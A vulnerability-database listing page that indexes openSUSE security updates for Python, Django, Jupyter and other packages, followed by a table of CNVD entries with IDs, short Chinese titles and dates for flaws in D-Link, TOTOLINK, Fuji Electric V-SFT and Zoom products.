opensuse-su-2025:15286-1 python311-3.11.13-2.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15285-1 python310-3.10.18-3.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15284-1 python311-urllib3_1-1.26.20-3.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15283-1 python311-urllib3-2.5.0-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15282-1 python311-rfc3161-client-1.0.3-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15281-1 python311-requests-2.32.4-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15280-1 python311-pytest-html-4.1.1-6.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15279-1 python311-pydata-sphinx-theme-0.16.1-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15278-1 jupyter-plotly-6.1.2-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15277-1 jupyter-panel-1.7.1-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15276-1 jupyter-nbdime-7.0.2-20.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15275-1 jupyter-nbclassic-1.3.1-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15274-1 jupyter-jupyterlab-templates-0.5.2-2.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15273-1 python311-jupyter-ydoc-3.1.0-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15272-1 python311-jupyter-core-5.8.1-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15271-1 jupyter-matplotlib-0.11.4-15.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15270-1 python-furo-doc-2024.8.6-3.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15269-1 jupyter-bqplot-jupyterlab-0.5.44-10.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15268-1 python311-Django4-4.2.22-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15267-1 python311-Django-5.2.2-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15266-1 pure-ftpd-1.0.51-5.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15265-1 libprotobuf-lite31_1_0-31.1-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15264-1 postgresql-jdbc-42.7.7-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15263-1 polaris-9.6.4-1.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cnvd-2025-13076 D-Link DSL-3782多个参数缓冲区溢出漏洞 2025-02-24 2025-06-20
cnvd-2025-13075 D-Link DSL-3782多个参数缓冲区溢出漏洞 2025-02-24 2025-06-20
cnvd-2025-13074 D-Link DSL-3782多个参数OS命令注入漏洞 2025-02-24 2025-06-20
cnvd-2025-13073 D-Link DSL-3782多个参数OS命令注入漏洞 2025-02-24 2025-06-20
cnvd-2025-13072 D-Link DSL-3782缓冲区溢出漏洞 2025-02-28 2025-06-20
cnvd-2025-13071 D-Link DAR-7000命令注入漏洞 2025-03-07 2025-06-20
cnvd-2025-13070 D-Link DAP-1562空指针取消引用漏洞 2025-03-13 2025-06-20
cnvd-2025-13069 D-Link DIR-823G授权问题漏洞 2025-03-19 2025-06-20
cnvd-2025-13068 D-Link DIR-632栈缓冲区溢出漏洞 2025-06-13 2025-06-20
cnvd-2025-13067 D-Link DI-8100存在未明漏洞 2025-06-17 2025-06-20
cnvd-2025-13066 D-Link DIR-632 /biurl_grou文件缓冲区溢出漏洞 2025-06-17 2025-06-20
cnvd-2025-12960 Fuji Electric V-SFT set_plc_type_default函数缓冲区溢出漏洞 2025-05-22 2025-06-20
cnvd-2025-12959 Fuji Electric V-SFT MakeItemGlidZahyou函数缓冲区溢出漏洞 2025-05-22 2025-06-20
cnvd-2025-12958 Fuji Electric V-SFT CWinFontInf::WinFontMsgCheck函数缓冲区溢出漏洞 2025-05-22 2025-06-20
cnvd-2025-12957 Fuji Electric V-SFT CV7BaseMap::WriteV7DataToRom函数缓冲区溢出漏洞 2025-05-22 2025-06-20
cnvd-2025-12951 Fuji Electric V-SFT缓冲区溢出漏洞(CNVD-2025-12951) 2025-05-26 2025-06-20
cnvd-2025-12956 Fuji Electric V-SFT CTxSubFile::get_ProgramFile_name函数缓冲区溢出漏洞 2025-05-22 2025-06-19
cnvd-2025-12955 Fuji Electric V-SFT Conv_Macro_Data函数缓冲区溢出漏洞 2025-05-22 2025-06-19
cnvd-2025-12954 Fuji Electric V-SFT CGamenDataRom::set_mr400_strc函数缓冲区溢出漏洞 2025-05-22 2025-06-19
cnvd-2025-12953 Fuji Electric V-SFT CDrawSLine::GetRectArea函数缓冲区溢出漏洞 2025-05-22 2025-06-19
cnvd-2025-12952 Fuji Electric V-SFT CDataRomErrorCheck::MacroCommandCheck函数缓冲区溢出漏洞 2025-05-22 2025-06-19
cnvd-2025-12894 TOTOLINK CA300-PoE缓冲区溢出漏洞 2024-08-02 2025-06-19
cnvd-2025-12893 TOTOLINK A7000R loginauth函数缓冲区溢出漏洞 2024-08-02 2025-06-19
cnvd-2025-12892 TOTOLINK EX1200L cstecgi.cgi文件setLanguageCfg函数堆栈缓冲区溢出漏洞 2024-08-19 2025-06-19
cnvd-2025-12891 TOTOLINK EX1200L缓冲区溢出漏洞 2024-08-20 2025-06-19
cnvd-2025-12890 TOTOLINK AC1200 T8/T10缓冲区溢出漏洞(CNVD-2025-12890) 2024-09-11 2025-06-19
cnvd-2025-12889 Zoom Workplace Apps for Windows权限提升漏洞 2025-02-13 2025-06-19
cnvd-2025-12888 Zoom Workplace Apps越界写入漏洞 2025-02-13 2025-06-19
cnvd-2025-12887 Zoom Workplace App for macOS拒绝服务漏洞 2025-02-13 2025-06-19
cnvd-2025-12886 Zoom Workplace App for Linux权限提升漏洞 2025-02-13 2025-06-19